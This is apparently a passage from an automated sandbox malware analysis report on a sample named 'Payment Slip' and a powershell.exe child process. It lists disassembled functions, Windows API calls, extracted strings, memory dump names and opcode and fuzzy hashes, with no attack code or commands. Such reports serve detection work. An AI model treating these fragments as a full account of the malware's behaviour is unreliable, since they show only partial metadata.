Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
GlobalFree.KERNEL32(?), ref: 0040383E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Analysis Process: powershell.exePID: 3372, Parent PID: 6048COMMON

Executed Functions

Function 042AEAD8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f49164904abeeb438e80ef0bcf6e932109374581edfbae1a4bf9eafc8efc0eb
Instruction ID: ce1dd50ef8d164c27979ee8e4b8617cd796fee5fb80917734b313a071fdf7baf
Opcode Fuzzy Hash: 5f49164904abeeb438e80ef0bcf6e932109374581edfbae1a4bf9eafc8efc0eb
Instruction Fuzzy Hash: 9CB16B70F1020ADFDB10CFA8C98579DBBF2BF88314F158529D815E7254EB74A856CB81

Function 042AF3A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028bef53a281133861e92814f2c473493cc7ef680f4bf8b8caada0abdb8f8f07
Instruction ID: abf15b1506386d10c69d26aab5df3ebd06b922f356418152e1cb3e284762a491
Opcode Fuzzy Hash: 028bef53a281133861e92814f2c473493cc7ef680f4bf8b8caada0abdb8f8f07
Instruction Fuzzy Hash: DCB19F70F1020A9FDF10CFA8CA8579DBBF2AF88714F198529D815E7254EB78A855CB81

Function 071C4610 Relevance: 33.6, Strings: 26, Instructions: 1118COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C49BE
4'cq, xrefs: 071C4CD0
4'cq, xrefs: 071C47BA
4'cq, xrefs: 071C4E2F
4'cq, xrefs: 071C4CDC
4'cq, xrefs: 071C4ED7
4'cq, xrefs: 071C4B05
4'cq, xrefs: 071C486E
4'cq, xrefs: 071C4D7B
4'cq, xrefs: 071C4916
4'cq, xrefs: 071C471E
4'cq, xrefs: 071C4F7F
4'cq, xrefs: 071C4E23
4'cq, xrefs: 071C4862
4'cq, xrefs: 071C4712
(frl, xrefs: 071C55F4
4'cq, xrefs: 071C4D87
4'cq, xrefs: 071C4A69
4'cq, xrefs: 071C4A5D
(frl, xrefs: 071C55EA
4'cq, xrefs: 071C47C6
4'cq, xrefs: 071C4ECB
4'cq, xrefs: 071C490A
4'cq, xrefs: 071C4F73
4'cq, xrefs: 071C49B2
4'cq, xrefs: 071C4B11

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl$(frl$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
API String ID: 0-2954483773
Opcode ID: 6e5ea1a9fc6f1aee643dcead165569a3157b1145845b820d609677a2d1d20e40
Instruction ID: bdf9708b4d8f803dd3f659447a4ccb6113e529eb63c3e64724b7bb793d507710
Opcode Fuzzy Hash: 6e5ea1a9fc6f1aee643dcead165569a3157b1145845b820d609677a2d1d20e40
Instruction Fuzzy Hash: 40A26FB0B01214CFDB65CFA8C455BA9BBB2AB94314F21816DD9059F382CB76ED81CF91

Function 071C45EE Relevance: 15.9, Strings: 12, Instructions: 909COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C4B05
4'cq, xrefs: 071C4CD0
4'cq, xrefs: 071C4ECB
4'cq, xrefs: 071C47BA
4'cq, xrefs: 071C4D7B
4'cq, xrefs: 071C490A
4'cq, xrefs: 071C4F73
4'cq, xrefs: 071C49B2
4'cq, xrefs: 071C4A5D
4'cq, xrefs: 071C4862
4'cq, xrefs: 071C4E23
4'cq, xrefs: 071C4712

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
API String ID: 0-66516834
Opcode ID: da9f948a0fa9dd7082ec23e83c4ecc7f793fe7aa225d9d03a39cd9c76d0fd790
Instruction ID: 8a29ab74fcd5c872b0600b9b11a99b3fd051934697e2f0ff248a229dac6b05d7
Opcode Fuzzy Hash: da9f948a0fa9dd7082ec23e83c4ecc7f793fe7aa225d9d03a39cd9c76d0fd790
Instruction Fuzzy Hash: 1C827FB4B05254CFEB25CFA4C451B99BBB2EB84314F2181ADD905AB382C776ED81CF91

Function 071C3178 Relevance: 15.7, Strings: 12, Instructions: 708COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C38CE
4'cq, xrefs: 071C42C1
-ck, xrefs: 071C43D1
4'cq, xrefs: 071C434C
4'cq, xrefs: 071C42CD
4'cq, xrefs: 071C4340
4'cq, xrefs: 071C38C2
x.ck, xrefs: 071C3B2D
-ck, xrefs: 071C3B72
x.ck, xrefs: 071C438C
(frl, xrefs: 071C40E3
(frl, xrefs: 071C40D9

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl$(frl$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.ck$x.ck$-ck$-ck
API String ID: 0-2844645855
Opcode ID: a12f721fa1fe6013fecf8dcf73e44aedf8216596a7f19525d85f5b6ef74d247b
Instruction ID: 6cebcd983a65275ca25816ee8e82e96351d34da4d387d94fe006c23322eb0684
Opcode Fuzzy Hash: a12f721fa1fe6013fecf8dcf73e44aedf8216596a7f19525d85f5b6ef74d247b
Instruction Fuzzy Hash: A2627FB4B002159FDB54CB98C941B5ABBB2EB84314F11C499D909AF391CB72ED85CF92

Function 071CFB6B Relevance: 9.1, Strings: 7, Instructions: 309COMMON

Download Yara Rule

Strings

$cq, xrefs: 071CFC2E
4'cq, xrefs: 071CFCC9
4'cq, xrefs: 071CFEB6
4'cq, xrefs: 071CFEAA
$cq, xrefs: 071CFC5F
$cq, xrefs: 071CFC4F
4'cq, xrefs: 071CFCBD

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq
API String ID: 0-408270263
Opcode ID: 3b5c857057115ba549e686950385e6dcbffaf714a86eb305912d76ed1adf4f06
Instruction ID: bc66854d639c256121aec9b67984c3e1532428695acd44a2d7c558b6f40d52e1
Opcode Fuzzy Hash: 3b5c857057115ba549e686950385e6dcbffaf714a86eb305912d76ed1adf4f06
Instruction Fuzzy Hash: AEA109B2B14206CFCB16CEA8C4016BA7BABAF95310F15846ED815CF2D5DB35D943CBA1

Function 071C3F94 Relevance: 6.6, Strings: 5, Instructions: 307COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C42C1
-ck, xrefs: 071C43D1
4'cq, xrefs: 071C4340
x.ck, xrefs: 071C438C
(frl, xrefs: 071C40D9

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl$4'cq$4'cq$x.ck$-ck
API String ID: 0-2081721105
Opcode ID: d514c8be7c9c0bec7520a49c49fea567ca837022ee6b16b65c9347e75654d4d2
Instruction ID: 1364eaf640a2cf676e4764d755f587f805cb5fb9189ed4ef642fba7837afe39e
Opcode Fuzzy Hash: d514c8be7c9c0bec7520a49c49fea567ca837022ee6b16b65c9347e75654d4d2
Instruction Fuzzy Hash: E6C1BBB0A04245CFDB15CFA8C561B9EBBB2EF99300F26C059E9056F395CB35E981CB91

Function 071C0778 Relevance: 6.5, Strings: 5, Instructions: 232COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C080C
$cq, xrefs: 071C07E7
$cq, xrefs: 071C07CB
4'cq, xrefs: 071C0818
$cq, xrefs: 071C07F3

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$$cq$$cq$$cq
API String ID: 0-838516036
Opcode ID: 068a9920e3f9ae219f51a68bcd4fc7c548c0f50d2abab3ec208e0a07054f6221
Instruction ID: 344c55a0d26a11c7722370360326d79b8bd0980264a4e0b03a16a08492f03260
Opcode Fuzzy Hash: 068a9920e3f9ae219f51a68bcd4fc7c548c0f50d2abab3ec208e0a07054f6221
Instruction Fuzzy Hash: 7C71F8B1B00216DFCB19DFB88C012AABBA6AFD9210F14807ED945DB281DB31D951CBE1

Function 071C9110 Relevance: 5.6, Strings: 4, Instructions: 590COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071C95A8
4'cq, xrefs: 071C9458
4'cq, xrefs: 071C95B2
4'cq, xrefs: 071C944E

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq
API String ID: 0-1446110543
Opcode ID: 07463f5f14de60b093fa2218791fec39ff884a9f5e8a4a0292bde5326ac1ad2a
Instruction ID: da144dd98e8a51346fc0f41fa7507eab47830082810b9a52c94d6f8634f8da1d
Opcode Fuzzy Hash: 07463f5f14de60b093fa2218791fec39ff884a9f5e8a4a0292bde5326ac1ad2a
Instruction Fuzzy Hash: 69127BB1B042568FCB16CBB8880276A7BA29FD6320F1580BED545CF2D1DB35ED41C7A2

Function 071CBD58 Relevance: 5.5, Strings: 4, Instructions: 502COMMON

Download Yara Rule

Strings

4'cq, xrefs: 071CC251
x.ck, xrefs: 071CC46B
4'cq, xrefs: 071CC245
-ck, xrefs: 071CC4B0

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$x.ck$-ck
API String ID: 0-2239141125
Opcode ID: 6fa403299f2d3d40508617b77d52f01d066bf7d0c212481a80b0375412fd48fc
Instruction ID: eaed329984544bb170d9c30f6c548a601992094ac1ba7026b9aecb33043436a6
Opcode Fuzzy Hash: 6fa403299f2d3d40508617b77d52f01d066bf7d0c212481a80b0375412fd48fc
Instruction Fuzzy Hash: E8223BB0B102149FDB54DB68CD51BAABBB2EB89314F1180D9D9095F392CB72ED81CF91

Function 071C3C08 Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071C3B2D
4'cq, xrefs: 071C38C2
-ck, xrefs: 071C3B72

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$x.ck$-ck
API String ID: 0-2934961605
Opcode ID: cc296c5bc8242e01e7e325fbc0caa727f1ec9c5549bee2ae9b8635d4e75ef78b
Instruction ID: 125a7995501581f83b3e0e8c7058f54b24fc7030c1faa91d53a6702cd0258b37
Opcode Fuzzy Hash: cc296c5bc8242e01e7e325fbc0caa727f1ec9c5549bee2ae9b8635d4e75ef78b
Instruction Fuzzy Hash: AA526FB4B002159FDB54CB58C851F5ABBB2EB84314F11C499D90AAF391CB72ED85CF92

Function 071C316E Relevance: 4.4, Strings: 3, Instructions: 633COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071C3B2D
4'cq, xrefs: 071C38C2
-ck, xrefs: 071C3B72

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$x.ck$-ck
API String ID: 0-2934961605
Opcode ID: 2e6eb065b190535c5fce7dc8569690cf15a3fadf5b1f50785f15e96d213ecb6b
Instruction ID: dcf5884d1494951757b34733f403cdfbac6fa5ad1ba1149c9352809a06247803
Opcode Fuzzy Hash: 2e6eb065b190535c5fce7dc8569690cf15a3fadf5b1f50785f15e96d213ecb6b
Instruction Fuzzy Hash: 4B527DB4A002159FDB54CF98C941F9ABBB2FB84314F11C499D909AB391CB72ED81CF92

Function 071CC549 Relevance: 4.4, Strings: 3, Instructions: 620COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071CC46B
4'cq, xrefs: 071CC245
-ck, xrefs: 071CC4B0

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$x.ck$-ck
API String ID: 0-2934961605
Opcode ID: 70816e69f304c3649f714bfd61010b0662ca9686952aa6637a908a35f7ecd302
Instruction ID: 42e38d4e1c7bef2e4841b0ca93d8451301a6effe964109f52dbccd1b2f668a69
Opcode Fuzzy Hash: 70816e69f304c3649f714bfd61010b0662ca9686952aa6637a908a35f7ecd302
Instruction Fuzzy Hash: 28424BB4B002149FD754DF68CD51BAABBB2EB89314F118099D9095F392CB72ED81CF91

Function 042AAFE8 Relevance: 4.3, Strings: 3, Instructions: 518COMMON

Download Yara Rule

Strings

$cq, xrefs: 042AB202
Hgq, xrefs: 042AB0AE
$cq, xrefs: 042AB567

Memory Dump Source

Source File: 00000002.00000002.2671317882.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_42a0000_powershell.jbxd

Similarity

API ID:
String ID: Hgq$$cq$$cq
API String ID: 0-2948965698
Opcode ID: 7b07e76d0e7d1b0e271fe6b6810ba34950382ea623bc1cb641205b225748bfd0
Instruction ID: e995c18e3bbfef3e0b774a0a628dfcd31d47b0dbecbb7cfef601fcf3d9763bb3
Opcode Fuzzy Hash: 7b07e76d0e7d1b0e271fe6b6810ba34950382ea623bc1cb641205b225748bfd0
Instruction Fuzzy Hash: AC225034B101188FCB25DB34C8557AEBBB2BF89304F1484A9D909AB361DF35AE95CF91

Function 071C3D19 Relevance: 4.2, Strings: 3, Instructions: 485COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071C3B2D
4'cq, xrefs: 071C38C2
-ck, xrefs: 071C3B72

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$x.ck$-ck
API String ID: 0-2934961605
Opcode ID: d45ecedf0a6a12ce34580c18a4719da52aea50919d55d10737c38eba2a1c6b7b
Instruction ID: c440969308e36711c497db2f59dc14d5b6efeb0de826aa10b7b65ce572ee439c
Opcode Fuzzy Hash: d45ecedf0a6a12ce34580c18a4719da52aea50919d55d10737c38eba2a1c6b7b
Instruction Fuzzy Hash: AA226FB4B002149FD754CB58C951F9ABBB2EB84314F11C498DA0AAF391CB72ED85CF92

Function 071CC630 Relevance: 4.2, Strings: 3, Instructions: 467COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071CC46B
4'cq, xrefs: 071CC245
-ck, xrefs: 071CC4B0

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$x.ck$-ck
API String ID: 0-2934961605
Opcode ID: d1cb1aa363f85d95632e5f4cc7a0089c905d1fc711bf707f2af7487269f2a2f3
Instruction ID: 3012faf04500e64c02e82ac970ef55ba75b0cf00571adfaba4db07735d79e4e8
Opcode Fuzzy Hash: d1cb1aa363f85d95632e5f4cc7a0089c905d1fc711bf707f2af7487269f2a2f3
Instruction Fuzzy Hash: 81124DB4B002149FD754DF68CD51BAABBB2EB89314F118099D9095F392CB72ED81CF91

Function 071C1040 Relevance: 3.0, Strings: 2, Instructions: 490COMMON

Download Yara Rule

Strings

tPcq, xrefs: 071C10D7
tPcq, xrefs: 071C10CB

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: tPcq$tPcq
API String ID: 0-2972849372
Opcode ID: 3a1099dc1d22bbcbe2addda6576f5a8e30798f85bbd64e36214379afe76648cc
Instruction ID: 019f731df23c735aac8c1e452b50df3345db7a12db8c4547115242a09deeacc7
Opcode Fuzzy Hash: 3a1099dc1d22bbcbe2addda6576f5a8e30798f85bbd64e36214379afe76648cc
Instruction Fuzzy Hash: 52127FF4B40209EFD715CFA8C441A6ABBB2EF95314F25C06AE9059B392CB72DC41DB91

Function 071C5E90 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

(frl, xrefs: 071C5FCA
(frl, xrefs: 071C5FD4

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl$(frl
API String ID: 0-2314542218
Opcode ID: f86c705c956eaa9f133cc9c93339217b9800a373ae4f4b753e17e2441ed87d34
Instruction ID: d345fa4fa2bbb7db7d3568b5074a0fd43b6bd6fc1f03f789cdfc7fac2aceff94
Opcode Fuzzy Hash: f86c705c956eaa9f133cc9c93339217b9800a373ae4f4b753e17e2441ed87d34
Instruction Fuzzy Hash: B29192B0A10205CFDB14CF98C541AAABBF3EF98314F258069D505AF391DB72ED91CB91

Function 071C0A80 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

tPcq, xrefs: 071C0B24
tPcq, xrefs: 071C0B30

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: tPcq$tPcq
API String ID: 0-2972849372
Opcode ID: f864965112c94dc98aa9a7518147fba0093ccbcccd1596864764c697eaa92f54
Instruction ID: ee38f0e0f23119c048386b51f257c520bea3c08d24431a8426d7058717714ab2
Opcode Fuzzy Hash: f864965112c94dc98aa9a7518147fba0093ccbcccd1596864764c697eaa92f54
Instruction Fuzzy Hash: 6A5149B5714346DFCB26CBE98C0176ABBA69FDA315F18C06EE5458B2D1CB31C940C361

Function 071C5E74 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

(frl, xrefs: 071C5FCA

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (frl
API String ID: 0-1368775000
Opcode ID: 841c5e87585bda2654ea4d08055236f4428d0d6155adf4624229aac351c9639c
Instruction ID: 3b5275b7c3efe2f7b2177ba4ae0bd2c0eb6dd36de1a41342d8dbe351c163db73
Opcode Fuzzy Hash: 841c5e87585bda2654ea4d08055236f4428d0d6155adf4624229aac351c9639c
Instruction Fuzzy Hash: 94919EB0A10205DFDB15CF98C541A9ABBF2EF98314F25806EE9056B392C772ED91CF91

Function 071C4458 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.ck, xrefs: 071C450A

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: x.ck
API String ID: 0-699186225
Opcode ID: c229d9df719a1151de06911a98a3b0f619190851fdd7173c11ae560aefafea4d
Instruction ID: 28f9a0e4cf2b1eab069308f747e185fbfcd84705af7658f300def7079d3bfd29
Opcode Fuzzy Hash: c229d9df719a1151de06911a98a3b0f619190851fdd7173c11ae560aefafea4d
Instruction Fuzzy Hash: A631A174B10204DFE714DBA8C952BAE7AB3EBC5310F118068EA056F395CF76DD418B91

Function 071C1164 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9fffc0ffc2f11fb079e3c5351554bf040598452ebd41fa21c4b678c187dc022
Instruction ID: 3fa6126e317b66b7b6b7a5afab4f05c0189ec0885f242e3c38ae538dc70e1747
Opcode Fuzzy Hash: e9fffc0ffc2f11fb079e3c5351554bf040598452ebd41fa21c4b678c187dc022
Instruction Fuzzy Hash: 07D18DB4A40209EFDB15CF98C441EA9BBB2FF95314F25C06AE9059B392C772EC41DB91

Function 042A95A8 Relevance: .3, Instructions: 319COMMON

